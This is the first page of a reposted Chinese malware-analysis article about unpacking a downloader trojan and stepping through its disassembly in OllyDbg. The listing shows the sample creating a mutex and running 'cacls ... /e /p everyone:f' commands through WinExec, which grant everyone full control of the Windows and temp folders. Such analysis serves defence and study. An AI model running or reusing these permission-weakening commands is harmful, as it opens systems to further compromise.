破解免杀_解析某下载者[Faust][网络技术]
本文“破解免杀_解析某下载者[Faust][网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
首先是查壳,NsPack 的壳直接esp定律脱掉.脱壳后还是显示yoda's Protector v1.02 这个可以不去管,因为紧缩的只是资源部份,无阻碍解析.
OD载入之后往下几步看到病毒主文件首先是成立了一个互斥量ttt555
004012D1 56 push esi
004012D2 53 push ebx
004012D3 53 push ebx
004012D4 FF15 24204000 call dword ptr [<&kernel32.Crea>; kernel32.CreateMutexA
持续向下是履行系统号令
0040134F 56 push esi
00401350 50 push eax
00401351 FF15 10374000 call dword ptr [403710] ; kernel32.GetWindowsDirectoryA
00401357 8B3D 40204000 mov edi, dword ptr [<&MSVCRT.spri>; MSVCRT.sprintf
0040135D 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
00401363 50 push eax
00401364 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
0040136A 68 C8364000 push 004036C8 ; cmd /c cacls %s /e /p everyone:f
0040136F 50 push eax
00401370 FFD7 call edi
00401372 83C4 0C add esp, 0C
00401375 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
0040137B 53 push ebx
0040137C 50 push eax
0040137D FF15 FC364000 call dword ptr [4036FC] ; kernel32.WinExec
00401383 8B1D 20204000 mov ebx, dword ptr [<&kernel32.Ge>; kernel32.GetTempPathA
00401389 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
0040138F 50 push eax
00401390 56 push esi
00401391 FFD3 call ebx
00401393 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
00401399 50 push eax
0040139A 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
004013A0 68 A4364000 push 004036A4 ; cmd /c cacls "%s" /e /p everyone:f
004013A5 50 push eax
004013A6 FFD7 call edi
004013A8 83C4 0C add esp, 0C
004013AB 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
004013B1 6A 00 push 0
004013B3 50 push eax
[1] [2] [3] [4] [5] [6] [7] [8] 下一页
以上是“破解免杀_解析某下载者[Faust][网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |